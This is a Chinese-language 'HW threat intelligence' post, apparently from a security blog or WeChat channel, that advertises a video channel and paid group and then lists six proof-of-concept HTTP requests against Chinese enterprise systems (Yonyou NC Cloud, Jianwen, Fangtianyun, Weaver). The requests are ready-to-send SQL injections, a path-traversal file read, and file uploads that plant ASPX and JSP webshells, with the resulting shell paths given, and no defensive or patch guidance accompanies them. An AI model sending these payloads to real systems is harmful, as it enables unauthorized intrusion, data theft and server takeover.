“HW威胁情报”
看到了,关注一下不吃亏啊,点个赞转发一下啦,WP看不下去的,可以B站搜:标松君,UP主录的打靶视频,欢迎关注。顺便宣传一下星球:重生者安全, 里面每天会不定期更新OSCP知识点,车联网,渗透红队以及漏洞挖掘工具等信息分享,欢迎加入;以及想挖SRC逻辑漏洞的朋友,可以私聊。
01
—
POC情报
1.用友NC Cloud queryStaffByName SQL注入漏洞
GET /ncchr/pm/staff/queryStaffByName?name=1%27%20AND%201=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--+ HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36Accesstokenncc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQConnection: close
2.建文工程管理系统 download2 文件读取漏洞
POST /Common/DownLoad2.aspx HTTP/1.1Host:Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0Content-Length: 28path=../log4net.config&Name=
3.方天云智慧平台系统文件上传
POST /Upload.ashx HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySl8siBbmVicABvTXConnection: close------WebKitFormBoundarySl8siBbmVicABvTXContent-Disposition: form-data; name="file"; filename="qwe.aspx"Content-Type: image/jpeg<%@Page Language="C#"%><%Response.Write("hello");System.IO.File.Delete(Request.PhysicalPath);%>------WebKitFormBoundarySl8siBbmVicABvTX--返回的路径名:UploadFile/CustomerFile/
4.方天云智慧平台系统 GetCustomerLinkman SQL注入漏洞
POST /WXAPI.asmx/GetCustomerLinkman HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0Content-Type: application/json{clmID:"1 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- QurA"}
5.泛微云桥文件上传
POST /wxclient/app/recruit/resume/addResume?fileElementId=H HTTP/1.1Host: 127.0.0.1:8088Content-Length: 361Cache-Control: max-age=0sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryD5Mawpg068t7pbxZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close------WebKitFormBoundaryD5Mawpg068t7pbxZContent-Disposition: form-data; name="file"; filename="shell.jsp"Content-Type: application/octet-stream127------WebKitFormBoundaryD5Mawpg068t7pbxZContent-Disposition: form-data; name="file"; filename="shell.jsp"Content-Type: application/octet-stream127------WebKitFormBoundaryD5Mawpg068t7pbxZ--shell地址:/upload/202408/1-2位大写字母/shell.jsp
6.泛微HrmService存在SQL注入漏洞
POST /services/HrmService HTTP/1.1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brConnection: closeSOAPAction: urn:weaver.hrm.webservice.HrmService.getHrmDepartmentInfoContent-Type: text/xml;charset=UTF-8Host:Content-Length: 427X-Forwarded-For: 127.0.0.1<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:hrm="http://localhost/services/HrmService"><soapenv:Header/><soapenv:Body><hrm:getHrmDepartmentInfo><!--type: string--><hrm:in0>gero et</hrm:in0><!--type: string--><hrm:in1>1)AND(db_name()like'ec%'</hrm:in1></hrm:getHrmDepartmentInfo></soapenv:Body></soapenv:Envelope>
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...